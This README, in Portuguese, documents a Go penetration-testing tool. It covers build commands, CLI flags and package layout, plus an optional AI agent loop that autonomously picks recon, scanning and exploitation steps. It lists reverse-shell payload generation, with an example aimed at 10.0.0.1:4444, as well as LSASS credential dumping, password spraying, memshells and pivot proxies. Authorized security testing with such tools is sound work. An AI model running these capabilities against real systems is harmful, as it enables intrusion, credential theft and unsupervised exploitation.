
Framework de teste de penetração com mecanismo de decisão orientado por IA
Framework de teste de penetração nativo do Windows escrito em Go. Arquitetura modular com mecanismo de decisão orientado por IA (API compatível com OpenAI).
go build -ldflags="-X main.version=$(git describe --tags)" -o FUCKER.exe ./cmd/fucker/
Compilação cruzada:
GOOS=linux GOARCH=amd64 go build -o FUCKER_linux_amd64 ./cmd/fucker/
GOOS=windows GOARCH=amd64 go build -o FUCKER_win_amd64.exe ./cmd/fucker/
GOOS=windows GOARCH=386 go build -o FUCKER_win_386.exe ./cmd/fucker/
FUCKER.exe -t example.com -portscan -fingerprint -vulnscan -report
FUCKER.exe -t example.com -subdomain -dirbuster
FUCKER.exe -socks 1080
FUCKER.exe -forward 3389:192.168.1.100:3389
FUCKER.exe -payload "revshell|10.0.0.1|4444"
Copie .env.example para .env:
Sem configuração de IA, a ferramenta roda em modo CLI manual (todas as flags funcionam normalmente).
Quando OPENAI_API_KEY está definida, a ferramenta executa um loop ReAct: o agente de IA decide quais ferramentas chamar com base nos resultados anteriores. O prompt do sistema define um fluxo de trabalho de pentest: reconhecimento -> fingerprint -> varredura de vulnerabilidades -> exploração -> relatório.
Sem IA, toda a funcionalidade está disponível via flags de CLI.
| Flag | Descrição |
|---|
-t | Domínio/IP/URL alvo |
-p | Portas (vírgula ou intervalo, padrão: 80,443,22,21,3389,3306,6379,27017) |
-subdomain | Enumeração de subdomínios |
-portscan | Varredura de portas TCP |
-fingerprint | Fingerprinting de serviços |
-dirbuster | Força bruta de diretórios |
-vulnscan | Varredura de vulnerabilidades baseada em POC |
-logic | Verificações de vulnerabilidades lógicas |
-spray | Pulverização de senhas |
-exploit | Módulos de exploração |
-report | Gerar relatório HTML + JSON |
-o | Arquivo de saída (padrão: report.html) |
-socks | Iniciar proxy SOCKS5 na porta |
-httpproxy | Iniciar proxy HTTP na porta |
-forward | Encaminhamento de porta (local:host:remoto) |
-payload | Gerar payload (revshell|IP|PORT) |
-v | Verboso |
-debug | Saída de depuração |
-workers | Workers concorrentes (padrão: 20) |
-timeout | Tempo limite de solicitação em segundos (padrão: 30) |
-proxy | URL do proxy |
-audit | Caminho do log de auditoria (padrão: audit.json) |
| Variável | Descrição |
|---|
OPENAI_BASE_URL | URL base da API compatível com OpenAI |
OPENAI_API_KEY | Chave da API |
OPENAI_MODEL_NAME | Modelo (padrão: gpt-4) |
PROXY | URL do proxy |
MAX_WORKERS | Máximo de workers (padrão: 20) |
REQUEST_TIMEOUT | Tempo limite em segundos (padrão: 30) |
RETRY_COUNT | Novas tentativas (padrão: 3) |
| Pacote | Descrição |
|---|
cmd/fucker/ | Ponto de entrada, parse de CLI, orquestração de módulos |
internal/ai/ | Cliente OpenAI, loop do agente ReAct, sistema de ferramentas |
internal/scanner/ | Varredura de portas, subdomínios, fingerprint, dirbuster |
internal/vuln/ | Mecanismo de POCs YAML, 16 POCs integrados, verificadores lógicos |
internal/exploit/ | Gerador de reverse shell, proxy SOCKS5/HTTP, memshell |
internal/lateral/ | Password spray, minidump do LSASS, proxy SMB/RDP |
internal/report/ | Relatório em template HTML, exportação JSON, pontuação de risco |
internal/logger/ | Registro em níveis, trilha de auditoria em audit.json |
internal/plugin/ | Carregador de plugins Python/Go |
internal/config/ | Carregador de .env |
internal/common/ | Tipos compartilhados |